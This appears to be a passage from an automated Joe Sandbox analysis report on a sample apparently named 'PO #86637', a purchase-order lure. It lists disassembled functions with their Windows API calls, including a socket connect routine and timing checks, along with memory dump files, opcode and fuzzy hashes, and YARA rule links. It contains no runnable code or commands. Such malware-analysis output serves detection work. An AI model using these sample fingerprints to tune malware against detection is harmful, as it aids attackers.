                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: RectWindow
                      • String ID:
                      • API String ID: 861336768-0
                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                      Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32 ref: 00449598
                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                      • _wcslen.LIBCMT ref: 0044960D
                      • _wcslen.LIBCMT ref: 0044961A
                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$_wcslen$_wcspbrk
                      • String ID:
                      • API String ID: 1856069659-0
                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                      Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(?), ref: 004478E2
                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                      • GetCursorPos.USER32(00000000), ref: 0044796A
                      • TrackPopupMenuEx.USER32(02EE6480,00000000,00000000,?,?,00000000), ref: 00447991
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CursorMenuPopupTrack$Proc
                      • String ID:
                      • API String ID: 1300944170-0
                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                      Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                      Download Yara Rule
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004479CC
                      • GetCursorPos.USER32(?), ref: 004479D7
                      • ScreenToClient.USER32(?,?), ref: 004479F3
                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Client$CursorFromPointProcRectScreenWindow
                      • String ID:
                      • API String ID: 1822080540-0
                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                      Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                      • EndPaint.USER32(?,?), ref: 00447D13
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                      • String ID:
                      • API String ID: 659298297-0
                      • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                      • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                      • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                      • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                      Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                      Download Yara Rule
                      APIs
                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                        • Part of subcall function 00440D98: SendMessageW.USER32(02EE1BC8,000000F1,00000000,00000000), ref: 00440E6E
                        • Part of subcall function 00440D98: SendMessageW.USER32(02EE1BC8,000000F1,00000001,00000000), ref: 00440E9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$EnableMessageSend$LongShow
                      • String ID:
                      • API String ID: 142311417-0
                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                      Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                      Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                      Download Yara Rule
                      APIs
                      • IsWindowVisible.USER32(?), ref: 00445879
                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                      • _wcslen.LIBCMT ref: 004458FB
                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                      • String ID:
                      • API String ID: 3087257052-0
                      • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                      • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                      Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                      • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                      • String ID:
                      • API String ID: 245547762-0
                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                      Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 004471D8
                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                      • SelectObject.GDI32(?,00000000), ref: 00447228
                      • BeginPath.GDI32(?), ref: 0044723D
                      • SelectObject.GDI32(?,00000000), ref: 00447266
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Object$Select$BeginCreateDeletePath
                      • String ID:
                      • API String ID: 2338827641-0
                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                      Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00434598
                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                      • Sleep.KERNEL32(00000000), ref: 004345D4
                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID:
                      • API String ID: 2875609808-0
                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                      Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                      • MessageBeep.USER32(00000000), ref: 00460C46
                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                      • EndDialog.USER32(?,00000001), ref: 00460C83
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                      • String ID:
                      • API String ID: 3741023627-0
                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                      Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteObjectWindow$Icon
                      • String ID:
                      • API String ID: 4023252218-0
                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                      Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                      • DeleteObject.GDI32(?), ref: 00455736
                      • DeleteObject.GDI32(?), ref: 00455744
                      • DestroyIcon.USER32(?), ref: 00455752
                      • DestroyWindow.USER32(?), ref: 00455760
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                      • String ID:
                      • API String ID: 1489400265-0
                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                      Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                      • DestroyWindow.USER32(?), ref: 00455728
                      • DeleteObject.GDI32(?), ref: 00455736
                      • DeleteObject.GDI32(?), ref: 00455744
                      • DestroyIcon.USER32(?), ref: 00455752
                      • DestroyWindow.USER32(?), ref: 00455760
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                      • String ID:
                      • API String ID: 1042038666-0
                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                      Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
